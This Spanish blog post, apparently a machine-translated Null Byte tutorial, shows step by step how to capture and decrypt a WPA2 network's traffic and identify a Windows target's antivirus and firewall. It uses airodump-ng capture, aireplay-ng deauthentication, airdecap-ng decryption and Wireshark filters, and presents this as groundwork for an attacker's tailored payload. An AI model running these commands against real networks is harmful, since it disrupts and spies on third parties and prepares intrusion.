NOTA IMPORTANTE: El delito informático está severamente castigado por la ley. Esta página no promueve el delito informático, es divulgativa y muestra los mecanismos que utilizan los cibercriminales para poder identificar el ataque si has sido victima de uno de ellos. En el caso de que hayas sido victima de un ataque te recomendamos que busques recursos legales en la sección Cibercrime Law o en la página del Instituto Nacional de Ciberseguridad: https://www.incibe.es/

BlogEvading AV Software

Cómo: identificar el software antivirus instalado en la PC con Windows 10 de un destino

Determinar el software antivirus y cortafuegos instalado en una computadora con Windows es crucial para un atacante que se prepara para crear una carga útil o un stager específico. Con la inspección profunda de paquetes encubierta, esa información se identifica fácilmente.

Este ataque supone que ya se conoce la contraseña de Wi-Fi de la red de destino. Con la contraseña, un atacante puede observar los datos que atraviesan la red y enumerar el software de seguridad instalado. Las soluciones populares de antivirus y firewall se vuelven fácilmente identificables cuando se filtra el tráfico web benigno.

Aprenderemos a capturar y descifrar el tráfico de Wi-Fi sin autenticarnos en el enrutador de destino, y realizaremos una inspección de paquetes para averiguar los tipos de aplicaciones de seguridad de terceros instaladas en el sistema operativo.

Paso 1: captura el tráfico de Wi-Fi

Para comenzar en Kali, use el airmon-ng comando para detener todos los procesos que se ejecutan en segundo plano y que pueden interferir con la tarjeta inalámbrica.

~# airmon-ng check kill

Killing these processes:

  PID Name
 2891 wpa_supplicant

Habilite el modo de monitor en el adaptador Alfa (o otro adaptador inalámbrico) con el airmon-ng start wlan0 mando.

~# airmon-ng start wlan0

PHY Interface   Driver      Chipset

phy2    wlan0       rt2800usb   Ralink Technology, Corp. RT2870/RT3070

        (mac80211 monitor mode vif enabled for [phy2]wlan0 on [phy2]wlan0mon)
        (mac80211 station mode vif disabled for [phy2]wlan0)

Luego, realice una airodump-ng escanee para enumerar las redes Wi-Fi en el área circundante.

~ # airodump-ng wlan0mon CH 6][ Elapsed: 36 s ][ 2020-04-06 20:45

 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 00:20:91:B4:F8:33  -19       13        6    0  11  270  WPA2 CCMP   PSK  NullByte_Network

 BSSID              STATION            PWR   Rate    Lost    Frames  Probe

When the router has been identified, press Control-C to stop the scan. Perform a targeted packet capture against the Wi-Fi router by including the –channel, –write, –bssid, and –essid options.

~# airodump-ng --channel 11 --write /root/Desktop/capture --bssid "00:20:91:B4:F8:33" --essid "NullByte_Network" wlan0mon

 CH  9 ][ Elapsed: 14 mins ][ 2020-04-06 21:00 ]

 

 BSSID PWR RXQ Beacons #Data, # / s CH MB ENC CIPHER AUTH ESSID 00: 20: 91: B4: F8: 33-20100 8308 1895 0 11270 WPA2 CCMP PSK NullByte_Network BSSID STATION PWR Tasa de tramas perdidas Sonda

Aireplay-ng anulará la autenticación de los dispositivos conectados al enrutador. Este comando es necesario para capturar los datos del protocolo de enlace WPA2. Los paquetes capturados solo se pueden descifrar con un protocolo de enlace válido.

Abra una nueva terminal y use lo siguiente aireplay-ng comando para enviar tres paquetes “deauth” al enrutador, lo que obliga a los usuarios autenticados a volver a conectarse.

~# aireplay-ng -0 3 -a 00:20:91:B4:F8:33 -e "NullByte_Network" wlan0mon

05:12:46  Waiting for beacon frame (BSSID: 00:20:91:B4:F8:33) on channel 11
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
05:12:46  Sending DeAuth (code 7) to broadcast -- BSSID: [00:20:91:B4:F8:33]
05:12:46  Sending DeAuth (code 7) to broadcast -- BSSID: [00:20:91:B4:F8:33]
05:12:47  Sending DeAuth (code 7) to broadcast -- BSSID: [00:20:91:B4:F8:33]

Un ataque exitoso producirá la notificación “Apretón de manos WPA” en la esquina superior derecha del airodump-ng Terminal.

CH  9 ][ Elapsed: 14 mins ][ 2020-04-06 21:00 ][ WPA handshake: 00:20:91:B4:F8:33 ]

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 00:20:91:B4:F8:33  -20 100     8308     1895    0  11  270  WPA2 CCMP   PSK  NullByte_Network

 BSSID              STATION            PWR   Rate    Lost    Frames  Probe

En este punto, el airodump-ng La ventana debería continuar capturando paquetes durante el mayor tiempo posible (es decir, muchas horas). A medida que pasa el tiempo, el software de seguridad en la computadora con Windows 10 de destino intentará periódicamente actualizar la aplicación y las bases de datos de definición de virus. Estas consultas web son valiosas para un pirata informático con acceso a la red que se prepara para montar un ataque dirigido.

Paso 2: descifre el PCAP

Airdecap-ng es una herramienta de descifrado de captura de paquetes y parte de la suite Aircrack-ng.

~# airdecap-ng -b "00:20:91:B4:F8:33" -e "NullByte_Network" -p "WIFI_PASSWORD_HERE" /root/Desktop/capture-01.cap

Total number of stations seen            8
Total number of packets read         32310
Total number of WEP data packets         0
Total number of WPA data packets      4555
Number of plaintext data packets         0
Number of decrypted WEP  packets         0
Number of corrupted WEP  packets         0
Number of decrypted WPA  packets      3435
Number of bad TKIP (WPA) packets         0
Number of bad CCMP (WPA) packets         0

Airdecap-ng utilizará el ESSID de Wi-Fi (-e) y la contraseña (-p) para descifrar y filtrar los paquetes que pertenecen a la red. En el ejemplo anterior, podemos ver 3435 paquetes descifrados WPA. Airdecap-ng creará un archivo llamado “capture-01-dec.cap” en el directorio actual.

Después de descifrar el PCAP, importe el nuevo archivo capture-01-dec.cap en Wireshark.

Paso 3: busque software antivirus (Avast)

Avast es una de las soluciones de software antiviral más populares del mundo.

Los dominios conocidos de Avast incluyen avast.com y avcdn.net, su red principal de distribución de contenido (CDN). Diariamente, estos dominios se utilizan para buscar actualizaciones de software y bases de datos de virus, así como para enviar información de telemetría. Estos dominios se pueden filtrar en Wireshark con el siguiente filtro de visualización.

ip.host ~ "(?i)(avast|avcdn).*"

Se pueden agregar muchos dominios antivirus al filtro y separarlos con barras verticales (|).

Los resultados anteriores son una fuerte indicación de que la computadora está utilizando el software antivirus Avast. Los datos se pueden inspeccionar más a fondo para identificar las cadenas de agente de usuario comúnmente utilizadas por este proveedor de antivirus.

http.user_agent ~ "(?i)avast*"

Esta secuencia HTTP en particular invocó una solicitud POST y entregó algunos datos sin cifrar a un servidor Avast. Como podemos ver, la solicitud se originó en la computadora con Windows 10 con un agente de usuario de Avast.

El cuerpo del flujo HTTP contiene algunos datos sin cifrar relacionados con el dispositivo de destino. El tipo de CPU, el nombre de host de Windows 10 y la arquitectura de la placa base, así como la versión de Avast y los ajustes de configuración, se pueden descubrir desde un único flujo HTTP.

POST /cgi-bin/iavs4stats.cgi HTTP/1.1
Host: v7.stats.avast.com
User-Agent: avast! Antivirus (instup)
Accept: */*
Content-MD5:
Content-Type: iavs4/stats
Content-Length:

GCHBitmap=0
GChBrand=AVFC
GTBBitmap=0
GTBBrand=
InstupVersion=19.5.4444.0
IsVirtual=1
NoRegistration=0
OfferEvent=0
OfferResult=2
SZB=0
ScAsAvastReg=1
ScAsAvastStatus=off
ScAsOtherList=Windows Defender Antivirus,Avast Antivirus,
ScAsOtherReg=2
ScAsOtherStatus=on,off,
ScAvAvastReg=1
ScAvAvastStatus=off
ScAvOtherList=Windows Defender Antivirus,Avast Antivirus,
ScAvOtherReg=2
ScAvOtherStatus=on,off,
ScFwAvastReg=0
ScFwAvastStatus=
ScFwOtherList=Windows Firewall,
ScFwOtherReg=1
ScFwOtherStatus=on,
ShepherdConfigName=Avast-Windows-AV-Consumer_email-signatures_antitrack-production_production-new-installs_version-18.6-and-higher_driver-updater-production_v19.3-and-higher_v18.7-and-higher_v2017_test-datasharing-consent_test-antitrack-text-b_free_test-upsell-screens_smartscan-last-screen_new-recomendo_production_version-17.9-and-higher_avast-19-r5_smartscan-free---antivirus_v18.3-and-higher_alpha-new-installs_mybackend-on_test-pam-no-master-password_v18.5-and-higher_chrome-installed-by-avast_cleanup-premium-installation
UpdatingTime=0
WEI_Cpu=8.4
WEI_D3D=9.9
WEI_Disk=7.3
WEI_Graphics=2.4
WEI_Memory=5.5
WEI_SystemRating=2.4
boot_time_scan_accepted=0
boot_time_scan_offered=0
brandCode=AVFC
bytes=199216597
bytesOK=199216597
community=1
cookie=mmm_ava_tst_004_762_b
cpu_name=Intel(R) Core(TM) i7-7700 CPU @ 2.80GHz,4
custom_scan_created=0
edition=1
gsMainStatus=0
gsNoticeNotifs=0
gsUrgentNotifs=0
gsWarningNotifs=0
gui_opened=4
gui_settings_altered=0
gui_settings_opened=0
guid=xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx
help_opened=0
idate_w=1508774395
lan_addr=tokyoneon-PC
lan_ip=192.168.1.152
lang=0409
licAlpha=1
licExpDays=30
licExpirationDate=1562974590
licFeature=5f0231d7-4c46-4855-8199-5d0cb185d427
licIssuedDate=1560382590
licSchemaId=avast-free-1s1m_1s1m
licType=Trial
licType2=4
offerInstReturn=0
offerReasons=0
offerType=1
on_demand_scan_invoked=0
operation=3
os=win,10,0,2,16299,0,AMD64
part.program=2378,2378,0,0
part.setup=2378,2378,0,0
part.vps=419828228,419828228,0,0
passive_mode=0
product=ais
ram_mb=4990
repo_id=iavs9x
serial=0
silent=0
status=00000000
statver=2.20
tspan=454
tspanOK=454
version=19.5.2378
statsSendTime=1260399041

Estos datos son muy valiosos para un atacante en la red, ya que les permite crear una carga útil específica para ese usuario y sistema operativo.

Además de Wireshark, tshark y grep puede imprimir y filtrar fácilmente solicitudes de DNS, respectivamente, en salida estándar. Adjuntar sort -u al comando para mostrar solo dominios únicos (es decir, no duplicados).

~# tshark -r ~/Desktop/capture-01-dec.cap -n -T fields -e dns.qry.name | grep -i "avast|avcdn" | sort -u

b1477563.iavs9x.u.avast.com
b4380882.iavs9x.u.avast.com
b4380882.vps18.u.avcdn.net
d3336443.vps18.u.avcdn.net
f3355109.iavs9x.u.avast.com
filerep.ff.avast.com
g0679661.iavs9x.u.avast.com
g0679661.vps18.u.avcdn.net
g5041154.vps18.u.avcdn.net
h1745978.iavs9x.u.avast.com
h6891735.vps18.u.avcdn.net
k8528219.iavs9x.u.avast.com
k9290131.iavs9x.u.avast.com
m5972635.vps18.u.avcdn.net
p3357684.vps18.u.avcdn.net
r4907515.vps18.u.avcdn.net
s-iavs9x.avcdn.net
s-vps18.avcdn.net
t7758057.vps18.u.avcdn.net
v6831430.vps18.u.avcdn.net
v7event.stats.avast.com
v7.stats.avast.com

Paso 4: busque el software de firewall (Comodo)

Cortafuegos Comodo es una popular solución de firewall diseñada para monitorear el tráfico entrante y saliente para identificar amenazas y prevenir ataques.

Su Configuración del servidor DNS hace que sea difícil para los atacantes en la red enumerar las aplicaciones instaladas y los sitios web visitados. Aún así, el software Comodo ocasionalmente buscará actualizaciones de software que le brinden al atacante toda la información que necesita.

ip.host ~ "(?i)(comodo).*"

Para ver los dominios consultados en la salida estándar, examine el PCAP con tshark y filtrar las solicitudes de DNS.

~# tshark -r ~/Desktop/capture-01-dec.cap -n -T fields -e dns.qry.name

Es probable que este comando produzca una salida grande que contenga miles de dominios, direcciones IP y entradas duplicadas. Anexar el clasificar y uniq comandos para contar los servidores más consultados.

~# tshark -r ~/Desktop/capture-01-dec.cap -n -T fields -e dns.qry.name | sort | uniq -c

      2 218.0.101.95.in-addr.arpa
     72 22.70.154.156.in-addr.arpa
     14 22.71.154.156.in-addr.arpa
      1 download.comodo.com
      1 ncc.avast.com
      1 su.ff.avast.com
      2 v10.vortex-win.data.microsoft.com
      1 wireshark.org

Note que el 22.70.154.156.in-addr.arpa La dirección aparece 72 veces en el PCAP. A búsqueda rápida y Búsqueda de IP sugiere 156.154.70.22 ha sido un servidor DNS de Comodo durante muchos años. Si bien esto no significa definitivamente que el objetivo tenga instalado el software Comodo, sugeriría que son conscientes de la seguridad.

Pensamientos finales

Este artículo cubrió solo algunos Filtros de visualización de Wireshark. Hay muchos HTTP, IP, y DNS filtros que ayudarían a un pirata informático a recopilar información sobre el objetivo.

Con un amplio lista de software antivirus popular, un atacante normalmente podrá decir con certeza si una máquina con Windows de destino tiene un software de seguridad instalado. Lo que es más aterrador es que la enumeración de software se logra sin conectarse a la red Wi-Fi o sin necesidad de acceso físico a la computadora.

Si te ha gustado este artículo, sígueme en Twitter. @tokyoneon_ y GitHub para estar al día con mis proyectos actuales. Para preguntas e inquietudes, déjeme un comentario o envíeme un mensaje en Twitter.

Foto de portada y capturas de pantalla de tokyoneon / Null Byte

Publicaciones relacionadas

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Botón volver arriba
Cerrar